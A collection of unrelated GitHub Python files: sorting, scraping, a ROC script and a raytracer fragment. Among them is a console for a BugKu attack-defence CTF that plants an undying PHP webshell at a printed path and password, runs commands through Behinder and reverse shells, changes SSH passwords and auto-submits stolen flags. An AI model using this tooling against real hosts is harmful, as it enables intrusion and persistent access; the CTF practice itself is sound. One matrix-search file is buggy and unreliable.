('%s_first\\t%s'%(filename,time_first))\n print ('%s_last\\t%s'%(filename,time_last))\n\n if '2017-10-31' in time_first:\n print ('2017-10-31\\t1')\n else:\n print ('2017-10-31\\t0')\n\n\n\n\n#{\"1509379200\":327588,\"1509386400\":348041,\"1509393600\":353297,\"1509404400\":369732}\n","repo_name":"81981266/BigDataProject","sub_path":"HadoopStreaming_Kaggle/mapper_kaggle_1.py","file_name":"mapper_kaggle_1.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20891061200","text":"#! /usr/bin/env python3.6\nimport sys\nfrom heapq import merge\nfrom runner import run_sort_test\n\ndef msort(data):\n '''do a merge sort'''\n if len(data) == 1:\n return data\n mid = len(data) // 2\n left = data[:mid]\n right = data[mid:]\n merged = merge(msort(left),msort(right))\n return merged\n\ndef mergesort(data):\n '''make it look like msort runs in-place so the test harness works'''\n data[:] = msort(data)\n\nif __name__ == '__main__':\n run_sort_test(mergesort)\n","repo_name":"markatto/practice-sorts","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3587770555","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy import Spider, Request\n\nfrom dianping.dz_location import getlocation\nfrom dianping.items import BabyItem\n\n\nclass BabySpider(Spider):\n name = 'baby'\n allowed_domains = ['www.dianping.com']\n start_urls = ['http://www.dianping.com/shenzhen/ch70']\n\n custom_settings = {\n 'LOG_FILE': 'log_baby.txt',\n }\n\n def parse(self, response):\n print('parse response.url:' + response.url)\n self.logger.debug('parse response.url:' + response.url)\n yield Request(response.url, callback=self.parse_list)\n le = LinkExtractor(restrict_css='.t-district')\n print('1' * 50)\n for link in le.extract_links(response):\n print(link, link.url, link.text)\n yield Request(link.url, callback=self.parse_region)\n\n def parse_region(self, response):\n print('parse_region response.url:' + response.url)\n self.logger.debug('parse_region response.url:' + response.url)\n yield Request(response.url, callback=self.parse_list)\n le = LinkExtractor(restrict_css='.tsub-list')\n print('2' * 100)\n for link in le.extract_links(response):\n print(link, link.url, link.text)\n yield Request(link.url, callback=self.parse_classfy)\n\n def parse_classfy(self, response):\n print('parse_classfy response.url:' + response.url)\n self.logger.debug('parse_classfy response.url:' + response.url)\n yield Request(response.url, callback=self.parse_list)\n le = LinkExtractor(restrict_css='.t-type')\n print('3' * 150)\n for link in le.extract_links(response):\n print(link, link.url, link.text)\n yield Request(link.url, callback=self.parse_list)\n\n def parse_list(self, response):\n print('parse_list response.url:' + response.url)\n self.logger.debug('parse_list response.url:' + response.url)\n item = BabyItem()\n\n li = response.css('.shop-list>li')\n print('parse_list li:{} response.url: {}'.format(li.css('.shopname::text').extract(), response.url))\n self.logger.debug('parse_list li:{} response.url: {}'.format(li.css('.shopname::text').extract(), response.url))\n for i in li:\n item['title'] = i.css('.shopname::text').extract_first()\n item['url'] = 'http:' + i.css('.shopname::attr(href)').extract_first()\n if i.css('a img::attr(data-lazyload)').extract_first():\n item['img'] = 'http:' + i.css('a img::attr(data-lazyload)').extract_first()\n else:\n item['img'] = 'http:' + i.css('a img::attr(src)').extract_first()\n item['star'] = float(i.css('.item-rank-rst::attr(class)').re_first(r'[1-9]\\d*|0')) / 10\n if i.css('.comment-count a::text').re_first(r'[1-9]\\d*|0'):\n item['review_num'] = int(i.css('.comment-count a::text').re_first(r'[1-9]\\d*|0'))\n item['mean_price'] = i.css('.price::text').extract_first()\n if i.css('.product-count a::text').extract_first():\n item['product_photos'] = i.css('.product-count a::text').extract_first().strip('\"')\n if i.css('.key-list::text').extract_first():\n item['location'] = ' '.join(i.css('.key-list::text').extract_first().strip().split())\n else:\n item['location'] = ''\n getlocation(item)\n item['number'] = item['url'].split('/')[-1]\n yield item\n\n le = LinkExtractor(restrict_css='div.Pages > a.NextPage')\n print('4' * 200)\n links = le.extract_links(response)\n # print(links, links.url, links.text)\n if links:\n next_url = links[0].url\n print('next_url:', next_url)\n yield Request(next_url, callback=self.parse_list)\n","repo_name":"wangqian6151/dazhongdianping","sub_path":"dianping/spiders/baby.py","file_name":"baby.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"358974462","text":"\n\ndef search2DMatrix(mat,target):\n\n\n def binarySearch(array,target):\n\n start = 0\n end = len(array)\n\n while start < end:\n\n mid = start + (end - start)//2\n\n\n if array[mid] == target:\n\n return True\n\n elif array[mid] < target:\n\n start = mid +1\n\n\n else:\n end = mid\n \n return False\n\n\n for row in mat:\n\n if target < mat[-1]:\n\n return binarySearch(row,target)\n\n\n return False\n\n","repo_name":"dikshap07/Algorithms-and-Data-Structures","sub_path":"src/search2DMatrix.py","file_name":"search2DMatrix.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"69914846006","text":"\"\"\"\nNota: A pesar de parecer simple considero que es un problema complejo si no se tiene el enfoque correcto.\n\nTraduccion del problema: Secuencia casi incremental\n\nTraducccion del enunciado:\n Dada una secuencia de enteros en un arreglo determinar cuando es posible obtener una secuencia estrictamente creciente\n removiendo no mas de un elemento del arreglo.\n\nEnfoque (approach):\n En este caso debemos tener en cuenta que no estamos limitados a usar una sola función.\n Por ende tendremos dos funciones:\n\n busqueda_disparejo:\n simplemente realiza la operación deseada: busca al elemento que es mayor o igual al siguiente\n devuelve ese elemento cuando lo encuentra o en cualquier otro caso retorna -1.\n\n almosIncreasingSecuence:\n si el indice es -1 finaliza el programa.\n si el indice no lo es, repite la funcion quitando el indice de la secuencia. (se a quitado un elemento de la secuencia)\n si se repite, se buca la siguiente posicion y se vuelve a comprobar. (se quita un segundo elemento)\n Si no se da ninguno de los anteriores no es la secuencia que buscamos.\n\nPD: La idea a futuro es modificar esté codigo. Usar algo mas comprensible y funcional.\n \n\"\"\"\n\n\ndef busqueda_disparejo(sequence):\n for i in range(len(sequence) - 1):\n if sequence[i] >= sequence[i + 1]:\n return i\n return -1\n\n\ndef almostIncreasingSequence(sequence):\n c = 0\n indice = busqueda_disparejo(sequence)\n if indice == -1:\n return True\n if busqueda_disparejo(sequence[indice - 1:indice] + sequence[indice + 1:]) == -1:\n return True\n if busqueda_disparejo(sequence[indice:indice + 1] + sequence[indice + 2:]) == -1:\n return True\n return False\n\n\n# El test fue hecho con la idea de verificar los fallos si implementamos diferentes algoritmos.\ndef test():\n #1\n if (almostIncreasingSequence( [1, 3, 2] )):\n print(\"ok\")\n else:\n print(\"revisar el primero\")\n #2\n if (almostIncreasingSequence( [10, 1, 2, 3, 4, 5] )):\n print(\"ok\")\n else:\n print(\"revisar el segundo\")\n #3\n if (almostIncreasingSequence( [0, -2, 5, 6] )): #verdadero\n print(\"ok\")\n else:\n print(\"revisar el tercero\")\n #4\n if not (almostIncreasingSequence([1, 3, 2, 1])): # falso\n print(\"ok\")\n else:\n print(\"revisar el cuarto\")\n # 5\n if not (almostIncreasingSequence([1, 2, 1, 2] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el quinto\")\n # 6\n if not (almostIncreasingSequence( [1, 4, 10, 4, 2] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el sexto\")\n # 7\n if not (almostIncreasingSequence([1, 1, 1, 2, 3])): # falso\n print(\"ok\")\n else:\n print(\"revisar el septimo\")\n # 8\n if not (almostIncreasingSequence( [40, 50, 60, 10, 20, 30] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el octavo\")\n # 9\n if (almostIncreasingSequence( [1, 1] )): # falso\n print(\"ok\")\n else:\n print(\"revisar el noveno\")\n # 10\n if (almostIncreasingSequence([1, 2, 3, 4, 3, 6])): # true\n print(\"ok\")\n else:\n print(\"revisar el decimo\")\ntest()\n\n\n\n","repo_name":"AlexisWolfWaisman/CodeFights-spanish","sub_path":"arcade/intro/LacostaDelOceano/almostIncreasingSecuence.py","file_name":"almostIncreasingSecuence.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41974689262","text":"\"\"\"\nroc_w_tf-servimg.py\n\nSending RGB image tiles to a running tf-serving POST for prediction and plotting ROC curve\n\nauthor: @DevelopmentSeed\n\nusage:\npython3 roc_w_tf-servimg.py --test_path=test \\\n --keyword1=not_school \\\n --keyword2=school \\\n --server_endpoint='http://localhost:8501/v1/models/2nd-iter_more-schools_tf-serving:predict' \\\n --plot_dir=plot_dir \\\n --model_time=\"0122_071829\"\n\n\n\"\"\"\n\n# needed package for serving the tf-serving image\nimport os\nimport json\nimport pprint\nimport time\nimport base64\nimport requests\nimport glob\nimport itertools\n\n# needed package for plotting ROC curve\n\nfrom os import makedirs, path as op\nimport numpy as np\nfrom sklearn.metrics import roc_curve, auc\nfrom scipy.spatial.distance import euclidean\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom keras import backend as K\nfrom keras.applications.xception import preprocess_input as xcept_preproc\nimport yaml\nfrom tqdm import tqdm\n\nimport argparse\nimport sys\n\ndef grouper(n, iterable, fillvalue=None):\n \"grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx\"\n args = [iter(iterable)] * n\n return itertools.zip_longest(*args, fillvalue=fillvalue)\n\ndef prediction(test_path, keyword1, keyword2, server_endpoint):\n \"\"\"\n function to compare y_test and y_predction in order to plot the ROC curve\n\n ----\n Params:\n test_path: file path for the test dataset\n keyword1: the catagory name 1 under the test path\n keyword2: the catagory name 2 under the test path\n server_endpoint: the url of tf-serving endpoint when you run your tf-serving docker image\n\n ----\n return: y_test and y_predict as numpy array\n \"\"\"\n not_school_images_paths = sorted(glob.glob(op.join(test_path, keyword1) + \"/*.jpg\"))\n school_images_paths = sorted(glob.glob(op.join(test_path, keyword2) + \"/*.jpg\"))\n\n y_test = list()\n for img in school_images_paths:\n y_test.append([img, 1, 0])\n\n for img in not_school_images_paths:\n y_test.append([img, 0, 1])\n\n imgs_lst = [item[0] for item in y_test]\n y_pred = []\n for group in grouper(50, imgs_lst):\n instances = []\n for img_fpath in group:\n print(img_fpath)\n try:\n with open(img_fpath, 'rb') as imageFile:\n b64_image = base64.b64encode(imageFile.read())\n instances.append({'image_bytes': {'b64': b64_image.decode('utf-8')}})\n except:\n pass\n\n payload = json.dumps({\"instances\": instances})\n\n start = time.time()\n r = requests.post(server_endpoint, data=payload)\n elapsed = time.time() - start\n\n #########################\n # Print results\n #########################\n pp = pprint.PrettyPrinter()\n print('\\nPredictions from local images:')\n pp.pprint(json.loads(r.content)['predictions'])\n y_pred.append(json.loads(r.content)['predictions'])\n # y_pred = [group] + y_pred\n\n print('Elapsed time: {} sec'.format(elapsed))\n y_pred_flatten = [item for sublist in y_pred for item in sublist]\n print(\"the total images go to plot ROC curve is:\")\n len_2plot = len(y_pred_flatten)\n print(\"*\" * 40)\n print(len_2plot)\n # get the first column of the y_test with the first 3000\n y_test_2plot = [item[2] for item in y_test[:len_2plot]]\n # get the first prediction column of y_pred for school\n y_pred_2plot = [item[0] for item in y_pred_flatten]\n y_test_arr = np.array(y_test_2plot)\n y_pred_arr = np.array(y_pred_2plot)\n\n return y_test_arr, y_pred_arr\n\ndef plot_roc(y_test_arr, y_pred_arr, plot_dir, model_time):\n \"\"\"\n Plot ROC curve\n \"\"\"\n if not op.isdir(plot_dir):\n makedirs(plot_dir)\n plot_dir = plot_dir\n model_time = model_time\n\n y_neg_pred = y_pred_arr[y_test_arr == 0] # Predictions for negative examples\n y_pos_pred = y_pred_arr[y_test_arr == 1] # Predictions for positive examples\n\n # Accuracy (should match tensorboard)\n correct = np.sum(y_test_arr == np.round(y_pred_arr))\n total = y_test_arr.shape[0]\n acc = float(correct)/ float(total)\n print('Accuracy: {:0.5f}'.format(acc))\n # Compute FPR, TPR for '1' label (i.e., positive examples)\n fpr, tpr, thresh = roc_curve(y_test_arr, y_pred_arr)\n roc_auc = auc(fpr, tpr)\n\n # Min corner dist (*one* optimal value for threshold derived from ROC curve)\n corner_dists = np.empty((fpr.shape[0]))\n for di, (x_val, y_val) in enumerate(zip(fpr, tpr)):\n corner_dists[di] = euclidean([0., 1.], [x_val, y_val])\n opt_cutoff_ind = np.argmin(corner_dists)\n min_corner_x = fpr[opt_cutoff_ind]\n min_corner_y = tpr[opt_cutoff_ind]\n\n ####################\n # Plot\n ####################\n print('Plotting.')\n plt.close('all')\n sns.set()\n sns.set_style('darkgrid', {\"axes.facecolor\": \".9\"})\n sns.set_context('talk', font_scale=1.1)\n\n fig, ax = plt.subplots(1, 1, figsize=(6, 6))\n ax.plot(fpr, tpr, lw=2, label='ROC curve (area={:0.2f})'.format(roc_auc))\n ax.plot([min_corner_x, min_corner_x], [0, min_corner_y],\n color='r', lw=1, label='Min-corner distance\\n(FPR={:0.2f}, thresh={:0.2f})'.format(min_corner_x, thresh[opt_cutoff_ind]))\n plt.plot([0, 1], [0, 1], color='black', lw=0.75, linestyle='--')\n ax.set_xlim([-0.03, 1.0])\n ax.set_ylim([0.0, 1.03])\n ax.set_xlabel('False Positive Rate\\n(1 - Specificity)')\n ax.set_ylabel('True Positive Rate\\n(Sensitivity)')\n ax.set_aspect('equal')\n ax.set_title('ROC curve for schools detection')\n plt.legend(loc=\"lower right\")\n fig.tight_layout()\n fig.savefig(op.join(plot_dir, 'roc_{}.png'.format(model_time)),\n dpi=150)\n\n # Plot a kernel density estimate and rug plot\n fig2, ax2 = plt.subplots(1, 1, figsize=(8, 6))\n kde_kws = dict(shade=True, clip=[0., 1.], alpha=0.3)\n rug_kws = dict(alpha=0.2)\n sns.distplot(y_neg_pred, hist=False, kde=True, rug=True, norm_hist=True, color=\"b\",\n kde_kws=kde_kws, rug_kws=rug_kws, label='True negatives', ax=ax2)\n sns.distplot(y_pos_pred, hist=False, kde=True, rug=True, norm_hist=True, color=\"r\",\n kde_kws=kde_kws, rug_kws=rug_kws, label='True positives', ax=ax2)\n ax2.set_title('Predicted scores for true positives and true negatives')\n ax2.set_xlim([0.0, 1.0])\n ax2.set_xlabel(\"Model's predicted score\")\n ax2.set_ylabel('Probability density')\n plt.legend(loc=\"best\")\n fig2.savefig(op.join(plot_dir, 'dist_fpr_tpr_{}.png'.format(model_time)),\n dpi=150)\n\ndef parse_arg(args):\n desc = \"plot_ROC_tf-serving\"\n dhf = argparse.RawTextHelpFormatter\n parse0 = argparse.ArgumentParser(description= desc, formatter_class=dhf)\n parse0.add_argument('--test_path', help=\"file path for the test dataset\")\n parse0.add_argument('--keyword1', help='the catagory name 1 under the test path')\n parse0.add_argument('--keyword2', help='the catagory name 2 under the test path')\n parse0.add_argument('--server_endpoint', help='the url of tf-serving endpoint when you run your tf-serving docker image')\n parse0.add_argument('--plot_dir', help='the directory to save plotted ROC curve')\n parse0.add_argument('--model_time', help='The model time from a trained model')\n return vars(parse0.parse_args(args))\n\ndef main(test_path, keyword1, keyword2, server_endpoint, plot_dir, model_time):\n y_test_arr, y_pred_arr = prediction(test_path, keyword1, keyword2, server_endpoint)\n plot_roc(y_test_arr, y_pred_arr, plot_dir, model_time)\n\ndef cli():\n args = parse_arg(sys.argv[1:])\n main(**args)\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"developmentseed/unicef-schools","sub_path":"main_model/utility-scripts/roc_w_tf-serving.py","file_name":"roc_w_tf-serving.py","file_ext":"py","file_size_in_byte":7689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"12137674700","text":"# coding=utf-8\r\nfrom cmd import Cmd\r\nfrom config.MemShellConfig import *\r\nfrom code.AutoAck import *\r\nfrom code.MemShell import *\r\nimport os\r\nclass YmlConsole(Cmd):\r\n prompt = \"YML-FOR-BugKu-> \"\r\n Object = None\r\n\r\n def __init__(self):\r\n Cmd.__init__(self)\r\n\r\n def preloop(self):\r\n string = \"\"\"\r\n ##########YML-AWD-Farmwork-FOR-BugKu-V3.0#################\r\n Powered By yemoli\r\n Date:2021-04-11 \r\n 1.BugKu新版IP添加只需指定前缀ip与端口即可,如192-168-1-X.awd.bugku.cn可使用如下命令\r\n addip 192.168.0.1-255 80 \r\n 2.存活探测在test.py \r\n \r\n \"\"\"\r\n self.commandHelp = \"\"\"\r\n Command Tips\r\n =============\r\n\r\n Command Tips\r\n ------- -----------\r\n init 初始化(清空靶机ip列表)\r\n addip 添加靶机 ip和端口\r\n removeip 移除某个ip\r\n showip 查看ip列表 \r\n addssh 添加ssh信息\r\n showssh 查看ssh列表\r\n removessh 移除某个ssh\r\n passh 更改ssh密码 \r\n autopassh 循环修改ssh密码\r\n sshcmd 批量执行预设的ssh命令\r\n recvcmd 反弹shell(recv)命令执行\r\n autorecvflag 通过recvshell自动拿flag并提交\r\n getflag 根据webreq获取一次flag\r\n showflag 查看已获取的flag\r\n submitflag 提交一次数据库中的flag\r\n autoreqflag webreq自动获取flag并提交\r\n setshell 设置一句话木马(php)\r\n showshell 查看存储的一句话木马\r\n getmell 获取不死马,执行反弹shell命令(php)\r\n setbehind 设置冰蝎木马(php)\r\n cmdbehind 利用冰蝎批量执行命令\r\n showbehind 查看存储的冰蝎木马\r\n rmsoftLink 删除现有的软链接\r\n exit 退出\r\n \"\"\"\r\n printRed(string)\r\n printGreen(self.commandHelp)\r\n\r\n def help_addip(self):\r\n printGreen(\"例如输��:addip 10.10.11-22.10 80-90\")\r\n printGreen(\"addip [ip段] [端口段]\")\r\n def help_showip(self):\r\n printGreen(\"查看已录入的ip\")\r\n def help_removeip(self):\r\n printGreen(\"例如输入:removeip 127.0.0.1-10 10-20\")\r\n printGreen(\"remove [ip段] [端口段]\")\r\n def help_setshell(self):\r\n printGreen(\"\"\"[demo]:setshell 39.105.92.157 8801-8810 assets/scripts/pass.php 123456 post\"\"\")\r\n def help_setbehind(self):\r\n printGreen(\"\"\"[demo]:setbehind 39.105.92.157 8801-8810 assets/scripts/shell.php 123456\"\"\")\r\n def help_addssh(self):\r\n printGreen(\"例如输入:addssh 10.10.11-22.10 80-90\")\r\n printGreen(\"addssh [ip段] [端口段]\")\r\n def help_removessh(self):\r\n printGreen(\"例如输入:removessh 127.0.0.1 22\")\r\n printGreen(\"remove [ip] [端口]\")\r\n def do_addssh(self,argv):\r\n init_ssh()\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_addssh()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n if save_ssh(ip_l, port_l):\r\n printGreen(\"[+]SSH信息录入成功\")\r\n else:\r\n printRed(\"[-]SSH信息录入失败\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1010\")\r\n def do_showssh(self,argv):\r\n count = 0\r\n result = select_ssh()\r\n printYellow(\"*****SSH-LIST*****\")\r\n printYellow(\"*****************\")\r\n for row in result:\r\n printGreen(row[0])\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]您暂未设置SSH信息\")\r\n printYellow(\"*****************\")\r\n\r\n def do_addip(self,argv):\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_addip()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n save_address(ip_l,port_l)\r\n # sql=\"\"\"insert into ipList (ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]ip地址录入成功\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1001\")\r\n def do_removeip(self,argv):\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_removeip()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n remove_address(ip_l,port_l)\r\n # sql=\"\"\"insert into ipList (ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]ip地址删除成功\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1002\")\r\n\r\n def do_removessh(self,argv):\r\n ip = argv.split(' ')\r\n if len(ip) != 2:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_removessh()\r\n else:\r\n ip_l = get_ip_list(ip[0])\r\n port_l = get_port_list(ip[1])\r\n try:\r\n remove_ssh(ip_l, port_l)\r\n # sql=\"\"\"insert into ipList (ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]SSH地址删除成功\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1012\")\r\n\r\n def do_showip(self,argv):\r\n count = 0\r\n result = select_ip()\r\n printYellow(\"*****IP-LIST*****\")\r\n printYellow(\"*****************\")\r\n for row in result:\r\n printGreen(row[0])\r\n count=1\r\n if count == 0:\r\n printRed(\"[-]您暂未设置ip\")\r\n printYellow(\"*****************\")\r\n\r\n def do_exit(self, argv):\r\n printGreen(\"See You Next Time!!!!\")\r\n return True\r\n\r\n def Error(self, info):\r\n print(info)\r\n return\r\n\r\n def do_init(self,argv):\r\n try:\r\n yml_init()\r\n printGreen(\"[+]初始化成功\")\r\n except:\r\n printRed(\"[-]初始化失败\")\r\n\r\n def do_getflag(self,argv):\r\n try:\r\n init_flag()\r\n f = open('flag.txt', 'w+', encoding='utf8')\r\n f.write(\"\")\r\n f.close()\r\n attack = Attack()\r\n attack.attack(func=payload)\r\n time.sleep(5)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1003\")\r\n\r\n def do_showflag(self,argv):\r\n count = 0\r\n result = select_flag()\r\n printYellow(\"*************************FLAG-LIST*****************************\")\r\n printYellow(\"***************************************************************\")\r\n for row in result:\r\n printGreen(f\"{row[0]}->{row[1]}\")\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]暂无flag\")\r\n printYellow(\"***************************************************************\")\r\n def do_submitflag(self,argv):\r\n try:\r\n attack=Attack()\r\n attack.trans_flag(func=reqFlagServer)\r\n time.sleep(5)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1004\")\r\n\r\n def do_autoreqflag(self,argv):\r\n try:\r\n while(1):\r\n auto_reqgetflag()\r\n progress_test(3)\r\n auto_submitflag()\r\n progress_test()\r\n\r\n except:\r\n print('[-]执行过程遇到错误,错误代码:1005')\r\n\r\n def do_autorecvflag(self,argv):\r\n try:\r\n while (1):\r\n auto_recvgetflag()\r\n progress_test(3)\r\n auto_submitflag()\r\n progress_test()\r\n # while(1):\r\n except:\r\n pass\r\n def do_autopassh(self,argv):\r\n try:\r\n while(1):\r\n printGreen(\"=============================\")\r\n attack = Attack(\"ssh\")\r\n attack.ack_ssh(func=passh)\r\n time.sleep(1)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1017\")\r\n def do_autosolkflag(self,argv):\r\n try:\r\n while(1):\r\n init_flag()\r\n f = open('flag.txt', 'w+', encoding='utf8')\r\n f.write(\"\")\r\n f.close()\r\n attack = Attack(\"softlink\")\r\n attack.ack_softLink(func=auto_solkflag)\r\n time.sleep(2)\r\n progress_test(3)\r\n auto_submitflag()\r\n progress_test()\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1019\")\r\n def do_setshell(self,argv):\r\n\r\n cmds = argv.split(' ')\r\n if len(cmds) != 5:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_setshell()\r\n else:\r\n ip = cmds[0]\r\n port = cmds[1]\r\n path = cmds[2]\r\n passwd = cmds[3]\r\n method = cmds[4]\r\n try:\r\n setWebShell(ip,port,path,passwd,method)\r\n # sql=\"\"\"insert into ipList (ip)values('10.0.1.1:82'),('10.0.1.2:82'),('10.0.1.3:82'),('10.0.1.4:82'),('10.0.1.5:82'),('10.0.1.6:82'),('10.0.1.7:82'),('10.0.1.8:82'),('10.0.1.9:82'),('10.0.1.10:82');\"\"\"\r\n printGreen(\"[+]WebShell录入成功,可尝试使用getmell获取不死马\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1008\")\r\n def do_setbehind(self,argv):\r\n cmds = argv.split(' ')\r\n if len(cmds) != 4:\r\n printYellow(\"==============================\")\r\n printRed(\"[-]输入有误!!!\")\r\n printYellow(\"==============================\")\r\n self.help_setbehind()\r\n else:\r\n ip = cmds[0]\r\n port = cmds[1]\r\n path = cmds[2]\r\n passwd = cmds[3]\r\n try:\r\n setBehinder(ip,port,path,passwd)\r\n printGreen(\"[+]Behinder录入成功,可尝试使用cmdbehind执行命令\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1017\")\r\n def do_getmell(self,argv):\r\n try:\r\n # if SoftLink == True:\r\n # init_softLink()\r\n attack=Attack()\r\n attack.ack_memshell(func=upMemShell)\r\n printYellow(\"[++]不死马地址:http://xxx/.yml.php?pass=y7m01i 密码awd\")\r\n except:\r\n printRed(\"[-]执行���程遇到错误,错误代码:1009\")\r\n def do_showshell(self,argv):\r\n count = 0\r\n result = select_shell()\r\n printYellow(\"*************************SHELL-LIST*****************************\")\r\n printYellow(\"***************************************************************\")\r\n for row in result:\r\n printGreen(f\"{row[1]} {row[2]} {row[3]}\")\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]暂无shell\")\r\n printYellow(\"***************************************************************\")\r\n def do_showbehind(self,argv):\r\n count = 0\r\n result = select_behinder()\r\n printYellow(\"*************************Behind-List*****************************\")\r\n printYellow(\"*****************************************************************\")\r\n for row in result:\r\n printGreen(f\"{row[1]} {row[2]}\")\r\n count = 1\r\n if count == 0:\r\n printRed(\"[-]暂无Behind\")\r\n printYellow(\"*****************************************************************\")\r\n\r\n def do_passh(self,argv):\r\n try:\r\n attack = Attack(\"ssh\")\r\n attack.ack_ssh(func=passh)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1011\")\r\n def do_sshcmd(self,argv):\r\n try:\r\n attack = Attack(\"ssh\")\r\n attack.ack_ssh(func=ssh_cmd)\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1012\")\r\n def do_recvcmd(self,argv):\r\n try:\r\n exec_recvcmd()\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1013\")\r\n def do_cmdbehind(self,argv):\r\n try:\r\n # if SoftLink == True:\r\n # init_softLink()\r\n attack = Attack('behinder')\r\n attack.ack_behinder(func=cmdBehinder)\r\n printGreen(\"=====================================\")\r\n except:\r\n printRed(\"[-]执行过程遇到错误,错误代码:1017\")\r\n def do_rmsoftLink(self,argv):\r\n try:\r\n init_softLink()\r\n printGreen(\"[+]删除成功\")\r\n except:\r\n printRed(\"[-]删除失败!\")\r\n def complete_yemoli(self, text, *ignored):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n yml = YmlConsole()\r\n # yml.cmdloop()\r\n try:\r\n os.system('clear')\r\n yml.cmdloop()\r\n except:\r\n exit()","repo_name":"yemoli/YML-AWD-FRAME-FOR-BUGKU","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":14515,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"76"} +{"seq_id":"42201843695","text":"from gl import Raytracer, color\nfrom obj import Obj, Texture, Envmap\nfrom sphere import *\nimport random\n\n\n\nbrick = Material(diffuse = color(0.8, 0.25, 0.25 ), spec = 16)\nstone = Material(diffuse = color(0.4, 0.4, 0.4 ), spec = 32)\nmirror = Material(spec = 64, matType = 1)\nglass = Material(spec = 64, ior = 1.5, matType= 2) \n\nboxMat = Material(texture = Texture('mwood.bmp'))\nlava = Material(texture = Texture('lava.bmp'))\nearthMat = Material(texture = Texture('energy.bmp'))\nwall =Material(texture = Texture('mbrick.bmp'))\n\n#size\nwidth = 580\nheight = 580\nr = Raytracer(width,height)\nr.glClearColor(0.2, 0.6, 0.8)\nr.glClear()\n\n#env map\nr.envmap = Envmap('animenv.bmp')\n\n#spheres\nprint(\"trabajando en esferas\")\nr.scene.append(Sphere([-1.01, 0.047, -4.552], 0.4, earthMat))\nr.scene.append(Sphere([1.01, 0.047, -4.552], 0.4, lava))\nr.scene.append(Sphere([0.01, 1.01, -5.552], 0.4, glass))\nr.scene.append(Sphere([0.01, 0.01, -3.552], 0.4, glass))\nr.scene.append(Sphere([0.01, -1.01, -3.552], 0.4, mirror))\n\n# Lights\nprint(\"trabajando en luces\")\nr.dirLight = DirectionalLight(direction = (1, -1, -2), intensity = 0.5) #directional light\nr.pointLights.append(PointLight(intensity=0.1, position=(0, 2.5, 0))) #spotlight\nr.ambientLight = AmbientLight(strength = 0.1) #ambientlight\n\n# 